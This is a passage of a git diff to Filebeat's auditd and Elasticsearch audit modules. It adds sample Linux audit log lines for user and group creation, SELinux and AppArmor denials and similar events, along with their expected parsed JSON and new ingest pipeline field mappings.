"event.kind": "event", "event.module": "auditd", + "event.original": "type=SOCKADDR msg=audit(1492753107.096:9004): saddr=02000050A9FEA9FE0000000000000000", "fileset.name": "log", "input.type": "log", "log.offset": 758, @@ -122,6 +139,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=PROCTITLE msg=audit(1492753107.096:9004): proctitle=\"(g_daemon)\"", "fileset.name": "log", "input.type": "log", "log.offset": 843, diff --git a/filebeat/module/auditd/log/test/avc.log b/filebeat/module/auditd/log/test/avc.log new file mode 100644 index 000000000000..04443e4c0ca1 --- /dev/null +++ b/filebeat/module/auditd/log/test/avc.log @@ -0,0 +1,3 @@ +type=AVC msg=audit(1226874073.147:96): avc: denied { getattr } for pid=2465 comm="httpd" path="/var/www/html/file1" dev=dm-0 ino=284133 scontext=unconfined_u:system_r:httpd_t:s0 tcontext=unconfined_u:object_r:samba_share_t:s0 tclass=file +type=AVC msg=audit(1524662933.080:61207): apparmor="DENIED" operation="ptrace" profile="docker-default" pid=5571 comm="metricbeat" requested_mask="trace" denied_mask="trace" peer="unconfined" +type=AVC msg=audit(1524662933.080:61207): seresult=1 diff --git a/filebeat/module/auditd/log/test/avc.log-expected.json b/filebeat/module/auditd/log/test/avc.log-expected.json new file mode 100644 index 000000000000..3179d7f8b092 --- /dev/null +++ b/filebeat/module/auditd/log/test/avc.log-expected.json @@ -0,0 +1,64 @@ +[ + { + "@timestamp": "2008-11-16T22:21:13.147Z", + "auditd.log.dev": "dm-0", + "auditd.log.ino": "284133", + "auditd.log.path": "/var/www/html/file1", + "auditd.log.scontext": "unconfined_u:system_r:httpd_t:s0", + "auditd.log.sequence": 96, + "auditd.log.tclass": "file", + "auditd.log.tcontext": "unconfined_u:object_r:samba_share_t:s0", + "event.action": "avc", + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=AVC msg=audit(1226874073.147:96): avc: denied { getattr } for pid=2465 comm=\"httpd\" path=\"/var/www/html/file1\" dev=dm-0 ino=284133 scontext=unconfined_u:system_r:httpd_t:s0 tcontext=unconfined_u:object_r:samba_share_t:s0 tclass=file", + "fileset.name": "log", + "input.type": "log", + "log.offset": 0, + "process.name": "httpd", + "process.pid": 2465, + "service.type": "auditd" + }, + { + "@timestamp": "2018-04-25T13:28:53.080Z", + "auditd.log.apparmor": "DENIED", + "auditd.log.denied_mask": "trace", + "auditd.log.operation": "ptrace", + "auditd.log.peer": "unconfined", + "auditd.log.profile": "docker-default", + "auditd.log.record_type": "AVC", + "auditd.log.requested_mask": "trace", + "auditd.log.sequence": 61207, + "event.action": [ + "violated-apparmor-policy" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=AVC msg=audit(1524662933.080:61207): apparmor=\"DENIED\" operation=\"ptrace\" profile=\"docker-default\" pid=5571 comm=\"metricbeat\" requested_mask=\"trace\" denied_mask=\"trace\" peer=\"unconfined\"", + "fileset.name": "log", + "input.type": "log", + "log.offset": 241, + "process.name": "metricbeat", + "process.pid": 5571, + "service.type": "auditd" + }, + { + "@timestamp": "2018-04-25T13:28:53.080Z", + "auditd.log.record_type": "AVC", + "auditd.log.sequence": 61207, + "auditd.log.seresult": "1", + "event.action": [ + "violated-selinux-policy" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=AVC msg=audit(1524662933.080:61207): seresult=1", + "fileset.name": "log", + "input.type": "log", + "log.offset": 433, + "service.type": "auditd" + } +] \ No newline at end of file diff --git a/filebeat/module/auditd/log/test/test.log-expected.json b/filebeat/module/auditd/log/test/test.log-expected.json index 8eb1b61a43e8..48caa4ae6c5b 100644 --- a/filebeat/module/auditd/log/test/test.log-expected.json +++ b/filebeat/module/auditd/log/test/test.log-expected.json @@ -11,6 +11,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=MAC_IPSEC_EVENT msg=audit(1485893834.891:18877201): op=SPD-delete auid=4294967295 ses=4294967295 res=1 src=192.168.2.0 src_prefixlen=24 dst=192.168.0.0 dst_prefixlen=16", "event.outcome": "1", "fileset.name": "log", "input.type": "log", @@ -33,9 +34,16 @@ "auditd.log.syscall": "44", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1485893834.891:18877199): arch=c000003e syscall=44 success=yes exit=184 a0=9 a1=7f564b2672a0 a2=b8 a3=0 items=0 ppid=1240 pid=1281 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"charon\" exe=2F7573722F6C6962657865632F7374726F6E677377616E2F636861726F6E202864656C6574656429 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -59,13 +67,23 @@ }, { "@timestamp": "2017-03-14T19:20:56.192Z", + "auditd.log.record_type": "USER_CMD", "auditd.log.sequence": 19600329, "auditd.log.ses": "11988", - "event.action": "user_cmd", + "event.action": [ + "ran-command" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=USER_CMD msg=audit(1489519256.192:19600329): user pid=4151 uid=497 auid=700 ses=11988 msg='cwd=\"/\" cmd=2F7573722F6C696236342F6E6167696F732F706C7567696E732F636865636B5F617374657269736B5F7369705F7065657273202D7020323032 terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 536, @@ -90,16 +108,26 @@ "auditd.log.lport": 22, "auditd.log.op": "start", "auditd.log.pfs": "curve25519-sha256@libssh.org", + "auditd.log.record_type": "CRYPTO_SESSION", "auditd.log.rport": 63927, "auditd.log.sequence": 406, "auditd.log.ses": "4294967295", "auditd.log.spid": "1299", "auditd.log.subj": "system_u:system_r:sshd_t:s0-s0:c0.c1023", - "event.action": "crypto_session", + "event.action": [ + "started-crypto-session" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22 exe=\"/usr/sbin/sshd\" hostname=? addr=96.241.146.97 terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "info" + ], "fileset.name": "log", "input.type": "log", "log.offset": 783, @@ -127,12 +155,16 @@ "auditd.log.data": "eh^?^?echo test^Mvim /etc/pam.d/password-auth-ac^Mman pam_tty_audit^Mman pam.d^Mvim /etc^Asudo ^E/pamd.sy^?^?^?^?^?.^?m.d/sy^I-a^Ia^?-a^I^Mman pam^Mt^?grep sys^?^?^?/var/lo^Ig/me^Is^I | grep pam_tty^Mgrep pam_tty /var/log/mes^I^M^[[A^Asudo ^Msudo su^M", "auditd.log.major": "136", "auditd.log.minor": "0", + "auditd.log.record_type": "TTY", "auditd.log.sequence": 1065565, "auditd.log.ses": "762", - "event.action": "tty", + "event.action": [ + "typed" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=TTY msg=audit(1491924063.550:1065565): tty pid=27930 uid=1000 auid=1000 ses=762 major=136 minor=0 comm=\"bash\" data=65687F7F6563686F20746573740D76696D202F6574632F70616D2E642F70617373776F72642D617574682D61630D6D616E2070616D5F7474795F61756469740D6D616E2070616D2E640D76696D202F657463017375646F20052F70616D642E73797F7F7F7F7F2E7F6D2E642F7379092D6109617F2D61090D6D616E2070616D0D747F67726570207379737F7F7F2F7661722F6C6F09672F6D65097309207C20677265702070616D5F7474790D677265702070616D5F747479202F7661722F6C6F672F6D6573090D1B5B41017375646F200D7375646F2073750D", "fileset.name": "log", "input.type": "log", "log.offset": 1178, @@ -150,6 +182,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=PROCTITLE msg=audit(1451781471.394:194438): proctitle=\"bash\"", "fileset.name": "log", "input.type": "log", "log.offset": 1733, @@ -163,6 +196,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=PROCTITLE msg=audit(1451781471.394:194440): proctitle=737368643A206275726E205B707269765D", "fileset.name": "log", "input.type": "log", "log.offset": 1799, @@ -172,19 +206,23 @@ "@timestamp": "2019-11-15T19:01:24.309Z", "auditd.log.gpg_res": "1", "auditd.log.key_enforce": "0", + "auditd.log.record_type": "SOFTWARE_UPDATE", "auditd.log.root_dir": "/", "auditd.log.sequence": 785, "auditd.log.ses": "3", "auditd.log.subj": "unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023", "auditd.log.sw": "gcc-4.8.5-39.el7.x86_64", "auditd.log.sw_type": "rpm", - "event.action": "software_update", + "event.action": [ + "package-updated" + ], "event.category": [ "package" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SOFTWARE_UPDATE msg=audit(1573844484.309:785): pid=3157 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='sw=\"gcc-4.8.5-39.el7.x86_64\" sw_type=rpm key_enforce=0 gpg_res=1 root_dir=\"/\" comm=\"yum\" exe=\"/usr/bin/python2.7\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", "event.type": [ "info" @@ -201,14 +239,18 @@ }, { "@timestamp": "2019-11-15T19:00:56.144Z", + "auditd.log.record_type": "SYSTEM_BOOT", "auditd.log.sequence": 5, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", - "event.action": "system_boot", + "event.action": [ + "booted-system" + ], "event.category": "host", "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSTEM_BOOT msg=audit(1573844456.144:5): pid=678 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg=' comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", "event.type": "info", "fileset.name": "log", @@ -223,14 +265,18 @@ }, { "@timestamp": "2019-11-15T19:01:57.054Z", + "auditd.log.record_type": "SYSTEM_SHUTDOWN", "auditd.log.sequence": 1163, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", - "event.action": "system_shutdown", + "event.action": [ + "shutdown-system" + ], "event.category": "host", "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSTEM_SHUTDOWN msg=audit(1573844517.054:1163): pid=4440 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg=' comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", "event.type": "info", "fileset.name": "log", @@ -251,6 +297,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=EXECVE msg=audit(1581371984.206:579393): argc=1 a0=top", "fileset.name": "log", "input.type": "log", "log.offset": 2688, @@ -264,17 +311,21 @@ "auditd.log.a2": "0x1fd4640", "auditd.log.a3": "0x7ffc6939f360", "auditd.log.items": "2", + "auditd.log.record_type": "SYSCALL", "auditd.log.sequence": 579398, "auditd.log.ses": "2", "auditd.log.subj": "unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023", "auditd.log.success": "yes", "auditd.log.syscall": "execve", "auditd.log.tty": "pts0", - "event.action": "syscall", + "event.action": [ + "executed" + ], "event.category": "process", "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1581371984.206:579398): arch=x86_64 syscall=execve success=yes exit=0 a0=0x1fd05c0 a1=0x1fd2730 a2=0x1fd4640 a3=0x7ffc6939f360 items=2 ppid=2563 pid=2614 auid=vagrant uid=vagrant gid=vagrant euid=vagrant suid=vagrant fsuid=vagrant egid=vagrant sgid=vagrant fsgid=vagrant tty=pts0 ses=2 comm=top exe=/usr/bin/top subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=(null)", "event.type": "info", "fileset.name": "log", "host.architecture": "x86_64", @@ -299,16 +350,20 @@ { "@timestamp": "2020-02-10T21:59:44.206Z", "auditd.log.name": "mymodule", + "auditd.log.record_type": "KERN_MODULE", "auditd.log.sequence": 579397, - "event.action": "kern_module", + "event.action": [ + "loaded-kernel-module" + ], "event.category": [ "driver" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=KERN_MODULE msg=audit(1581371984.206:579397): name=mymodule", "event.type": [ - "info" + "start" ], "fileset.name": "log", "input.type": "log", @@ -319,14 +374,18 @@ "@timestamp": "2017-12-17T10:44:41.075Z", "auditd.log.op": "create", "auditd.log.reason": "api", + "auditd.log.record_type": "VIRT_CONTROL", "auditd.log.sequence": 145, "auditd.log.ses": "3", "auditd.log.subj": "system_u:system_r:container_runtime_t:s0", - "event.action": "virt_control", + "event.action": [ + "issued-vm-control" + ], "event.category": "host", "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=VIRT_CONTROL msg=audit(1513507481.075:145): pid=1431 uid=0 auid=100 ses=3 subj=system_u:system_r:container_runtime_t:s0 msg='user=root reason=api op=create vm=? vm-pid=? hostname=? exe=\"/usr/bin/dockerd-current\" addr=? terminal=? res=success'", "event.outcome": "success", "event.type": "creation", "fileset.name": "log", @@ -343,6 +402,7 @@ "@timestamp": "2016-12-16T15:45:43.572Z", "auditd.log.img-ctx": "system_u:object_r:svirt_image_t:s0:c444,c977", "auditd.log.model": "selinux", + "auditd.log.record_type": "VIRT_MACHINE_ID", "auditd.log.sequence": 23118, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:virtd_t:s0-s0:c0.c1023", @@ -352,11 +412,14 @@ "auditd.log.vm-ctx": "system_u:system_r:svirt_t:s0:c444,c977", "container.name": "rhel-work3", "container.runtime": "kvm", - "event.action": "virt_machine_id", + "event.action": [ + "assigned-vm-id" + ], "event.category": "host", "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=VIRT_MACHINE_ID msg=audit(1481903143.572:23118): pid=5637 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:virtd_t:s0-s0:c0.c1023 msg='virt=kvm vm=\"rhel-work3\" uuid=5501263b-181d-47ed-ab03-a6066f3d26bf vm-ctx=system_u:system_r:svirt_t:s0:c444,c977 img-ctx=system_u:object_r:svirt_image_t:s0:c444,c977 model=selinux exe=\"/usr/sbin/libvirtd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", "event.type": "creation", "fileset.name": "log", diff --git a/filebeat/module/auditd/log/test/useradd.log b/filebeat/module/auditd/log/test/useradd.log new file mode 100644 index 000000000000..3f99f5e3b41f --- /dev/null +++ b/filebeat/module/auditd/log/test/useradd.log @@ -0,0 +1,8 @@ +type=ADD_GROUP msg=audit(1610903553.686:584): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/group id=1004 exe="/usr/sbin/groupadd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=ADD_GROUP msg=audit(1610903553.710:586): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/gshadow id=1004 exe="/usr/sbin/groupadd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=ADD_GROUP msg=audit(1610903553.710:587): pid=2940 uid=0 auid=1000 ses=14 msg='op= id=1004 exe="/usr/sbin/groupadd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=ADD_USER msg=audit(1610903553.730:591): pid=2945 uid=0 auid=1000 ses=14 msg='op=adding user id=1004 exe="/usr/sbin/useradd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=USER_ACCT msg=audit(1610903553.814:593): pid=2948 uid=0 auid=1000 ses=14 msg='pam_tally2 uid=1004 reset=0 exe="/sbin/pam_tally2" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/2 res=success' +type=USER_CHAUTHTOK msg=audit(1610903558.174:594): pid=2953 uid=0 auid=1000 ses=14 msg='op=PAM:chauthtok acct="charlie" exe="/usr/bin/passwd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=USER_AUTH msg=audit(1610903558.178:595): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:authentication acct="root" exe="/usr/bin/chfn" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=USER_ACCT msg=audit(1610903558.178:596): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:accounting acct="root" exe="/usr/bin/chfn" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' diff --git a/filebeat/module/auditd/log/test/useradd.log-expected.json b/filebeat/module/auditd/log/test/useradd.log-expected.json new file mode 100644 index 000000000000..3eb42fe0a863 --- /dev/null +++ b/filebeat/module/auditd/log/test/useradd.log-expected.json @@ -0,0 +1,300 @@ +[ + { + "@timestamp": "2021-01-17T17:12:33.686Z", + "auditd.log.hostname": "ubuntu-bionic", + "auditd.log.id": "1004", + "auditd.log.op": "adding group to /etc/group", + "auditd.log.record_type": "ADD_GROUP", + "auditd.log.sequence": 584, + "auditd.log.ses": "14", + "auditd.log.uid": "0", + "event.action": [ + "added-group-account-to" + ], + "event.category": [ + "iam" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=ADD_GROUP msg=audit(1610903553.686:584): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/group id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "group", + "creation" + ], + "fileset.name": "log", + "group.id": "1004", + "input.type": "log", + "log.offset": 0, + "process.executable": "/usr/sbin/groupadd", + "process.pid": 2940, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.effective.id": "0", + "user.id": "1000", + "user.terminal": "pts/2" + }, + { + "@timestamp": "2021-01-17T17:12:33.710Z", + "auditd.log.hostname": "ubuntu-bionic", + "auditd.log.id": "1004", + "auditd.log.op": "adding group to /etc/gshadow", + "auditd.log.record_type": "ADD_GROUP", + "auditd.log.sequence": 586, + "auditd.log.ses": "14", + "auditd.log.uid": "0", + "event.action": [ + "added-group-account-to" + ], + "event.category": [ + "iam" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=ADD_GROUP msg=audit(1610903553.710:586): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/gshadow id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "group", + "creation" + ], + "fileset.name": "log", + "group.id": "1004", + "input.type": "log", + "log.offset": 212, + "process.executable": "/usr/sbin/groupadd", + "process.pid": 2940, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.effective.id": "0", + "user.id": "1000", + "user.terminal": "pts/2" + }, + { + "@timestamp": "2021-01-17T17:12:33.710Z", + "auditd.log.hostname": "ubuntu-bionic", + "auditd.log.id": "1004", + "auditd.log.record_type": "ADD_GROUP", + "auditd.log.sequence": 587, + "auditd.log.ses": "14", + "auditd.log.uid": "0", + "event.action": [ + "added-group-account-to" + ], + "event.category": [ + "iam" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=ADD_GROUP msg=audit(1610903553.710:587): pid=2940 uid=0 auid=1000 ses=14 msg='op= id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "group", + "creation" + ], + "fileset.name": "log", + "group.id": "1004", + "input.type": "log", + "log.offset": 426, + "process.executable": "/usr/sbin/groupadd", + "process.pid": 2940, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.effective.id": "0", + "user.id": "1000", + "user.terminal": "pts/2" + }, + { + "@timestamp": "2021-01-17T17:12:33.730Z", + "auditd.log.hostname": "ubuntu-bionic", + "auditd.log.id": "1004", + "auditd.log.op": "adding user", + "auditd.log.record_type": "ADD_USER", + "auditd.log.sequence": 591, + "auditd.log.ses": "14", + "auditd.log.uid": "0", + "event.action": [ + "added-user-account" + ], + "event.category": [ + "iam" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=ADD_USER msg=audit(1610903553.730:591): pid=2945 uid=0 auid=1000 ses=14 msg='op=adding user id=1004 exe=\"/usr/sbin/useradd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "user", + "creation" + ], + "fileset.name": "log", + "input.type": "log", + "log.offset": 612, + "process.executable": "/usr/sbin/useradd", + "process.pid": 2945, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.effective.id": "0", + "user.id": "1000", + "user.target.id": "1004", + "user.terminal": "pts/2" + }, + { + "@timestamp": "2021-01-17T17:12:33.814Z", + "auditd.log.hostname": "localhost", + "auditd.log.record_type": "USER_ACCT", + "auditd.log.reset": "0", + "auditd.log.sequence": 593, + "auditd.log.ses": "14", + "auditd.log.uid": [ + "0", + "1004" + ], + "event.action": [ + "was-authorized" + ], + "event.category": [ + "authentication" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=USER_ACCT msg=audit(1610903553.814:593): pid=2948 uid=0 auid=1000 ses=14 msg='pam_tally2 uid=1004 reset=0 exe=\"/sbin/pam_tally2\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.offset": 807, + "process.executable": "/sbin/pam_tally2", + "process.pid": 2948, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.id": "1000", + "user.terminal": "/dev/pts/2" + }, + { + "@timestamp": "2021-01-17T17:12:38.174Z", + "auditd.log.hostname": "ubuntu-bionic", + "auditd.log.op": "PAM:chauthtok", + "auditd.log.record_type": "USER_CHAUTHTOK", + "auditd.log.sequence": 594, + "auditd.log.ses": "14", + "auditd.log.uid": "0", + "event.action": [ + "changed-password" + ], + "event.category": [ + "iam" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=USER_CHAUTHTOK msg=audit(1610903558.174:594): pid=2953 uid=0 auid=1000 ses=14 msg='op=PAM:chauthtok acct=\"charlie\" exe=\"/usr/bin/passwd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "user", + "change" + ], + "fileset.name": "log", + "input.type": "log", + "log.offset": 1008, + "process.executable": "/usr/bin/passwd", + "process.pid": 2953, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.effective.id": "0", + "user.id": "1000", + "user.name": "charlie", + "user.target.name": "charlie", + "user.terminal": "pts/2" + }, + { + "@timestamp": "2021-01-17T17:12:38.178Z", + "auditd.log.hostname": "ubuntu-bionic", + "auditd.log.op": "PAM:authentication", + "auditd.log.record_type": "USER_AUTH", + "auditd.log.sequence": 595, + "auditd.log.ses": "14", + "auditd.log.uid": "0", + "event.action": [ + "authenticated" + ], + "event.category": [ + "authentication" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=USER_AUTH msg=audit(1610903558.178:595): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:authentication acct=\"root\" exe=\"/usr/bin/chfn\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.offset": 1216, + "process.executable": "/usr/bin/chfn", + "process.pid": 2954, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "root", + "user.terminal": "pts/2" + }, + { + "@timestamp": "2021-01-17T17:12:38.178Z", + "auditd.log.hostname": "ubuntu-bionic", + "auditd.log.op": "PAM:accounting", + "auditd.log.record_type": "USER_ACCT", + "auditd.log.sequence": 596, + "auditd.log.ses": "14", + "auditd.log.uid": "0", + "event.action": [ + "was-authorized" + ], + "event.category": [ + "authentication" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=USER_ACCT msg=audit(1610903558.178:596): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:accounting acct=\"root\" exe=\"/usr/bin/chfn\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", + "event.outcome": "success", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.offset": 1419, + "process.executable": "/usr/bin/chfn", + "process.pid": 2954, + "service.type": "auditd", + "source.address": "127.0.0.1", + "source.ip": "127.0.0.1", + "user.audit.id": "1000", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "root", + "user.terminal": "pts/2" + } +] \ No newline at end of file diff --git a/filebeat/module/elasticsearch/audit/_meta/fields.yml b/filebeat/module/elasticsearch/audit/_meta/fields.yml index ceb94c00dd55..38774e4f8b9c 100644 --- a/filebeat/module/elasticsearch/audit/_meta/fields.yml +++ b/filebeat/module/elasticsearch/audit/_meta/fields.yml @@ -1,6 +1,5 @@ - name: audit type: group - description: > fields: - name: layer description: "The layer from which this event originated: rest, transport or ip_filter" @@ -26,6 +25,12 @@ description: "Roles to which the principal belongs" example: [ "kibana_admin", "beats_admin" ] type: keyword + - name: user.run_as.name + type: keyword + - name: user.run_as.realm + type: keyword + - name: component + type: keyword - name: action description: "The name of the action that was executed" example: "cluster:monitor/main" @@ -63,3 +68,5 @@ migration: true - name: message type: text + - name: invalidate.apikeys.owned_by_authenticated_user + type: boolean diff --git a/filebeat/module/elasticsearch/audit/config/audit.yml b/filebeat/module/elasticsearch/audit/config/audit.yml index 1f8b49a6c550..bdf1cf8696ea 100644 --- a/filebeat/module/elasticsearch/audit/config/audit.yml +++ b/filebeat/module/elasticsearch/audit/config/audit.yml @@ -10,7 +10,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - if: regexp: message: "^{" diff --git a/filebeat/module/elasticsearch/audit/ingest/pipeline-json.yml b/filebeat/module/elasticsearch/audit/ingest/pipeline-json.yml index 93cf638b763c..047942ef960d 100644 --- a/filebeat/module/elasticsearch/audit/ingest/pipeline-json.yml +++ b/filebeat/module/elasticsearch/audit/ingest/pipeline-json.yml @@ -3,8 +3,6 @@ processors: - json: field: message target_field: elasticsearch.audit -- drop: - if: ctx.elasticsearch.audit?.type != null && ctx.elasticsearch.audit.type != 'audit' - remove: field: elasticsearch.audit.type ignore_missing: true @@ -16,6 +14,7 @@ processors: - yyyy-MM-dd'T'HH:mm:ss,SSS - yyyy-MM-dd'T'HH:mm:ss,SSSZ timezone: '{{ event.timezone }}' + ignore_failure: true - remove: if: ctx.elasticsearch.audit['@timestamp'] == null && ctx.event.timezone != null field: event.timezone @@ -80,6 +79,54 @@ processors: - rename: field: elasticsearch.audit.node target_field: elasticsearch.node +- rename: + field: elasticsearch.audit.change.disable.user.name + target_field: user.name + ignore_missing: true +- rename: + field: elasticsearch.audit.change.enable.user.name + target_field: user.name + ignore_missing: true +- rename: + field: elasticsearch.audit.delete.user.name + target_field: user.name + ignore_missing: true +- rename: + field: elasticsearch.audit.put.user.name + target_field: user.name + ignore_missing: true +- rename: + field: elasticsearch.audit.put.user.full_name + target_field: user.full_name + ignore_missing: true +- rename: + field: elasticsearch.audit.put.user.email + target_field: user.email + ignore_missing: true +- remove: + field: elasticsearch.audit.put + ignore_missing: true +- rename: + field: elasticsearch.audit.invalidate.apikeys.user.name + target_field: user.name + ignore_missing: true +- rename: + field: elasticsearch.audit.invalidate.apikeys.user.realm + target_field: elasticsearch.audit.user.realm + ignore_missing: true +- dot_expander: + field: user.run_as.name + path: elasticsearch.audit + ignore_failure: true +- dot_expander: + field: user.run_as.realm + path: elasticsearch.audit + ignore_failure: true +- convert: + field: elasticsearch.audit.user.run_as.name + target_field: user.effective.name + type: string + ignore_failure: true - dot_expander: field: user.name path: elasticsearch.audit @@ -87,6 +134,9 @@ processors: field: elasticsearch.audit.user.name target_field: user.name ignore_missing: true +- dot_expander: + field: user.email + path: elasticsearch.audit - dot_expander: field: request.method path: elasticsearch.audit @@ -104,10 +154,17 @@ processors: - dot_expander: field: cluster.name path: elasticsearch.audit +- dot_expander: + field: cluster.uuid + path: elasticsearch.audit - rename: field: elasticsearch.audit.cluster.name target_field: elasticsearch.cluster.name ignore_missing: true +- rename: + field: elasticsearch.audit.cluster.uuid + target_field: elasticsearch.cluster.uuid + ignore_missing: true - rename: field: elasticsearch.audit.level target_field: log.level diff --git a/filebeat/module/elasticsearch/audit/ingest/pipeline.yml 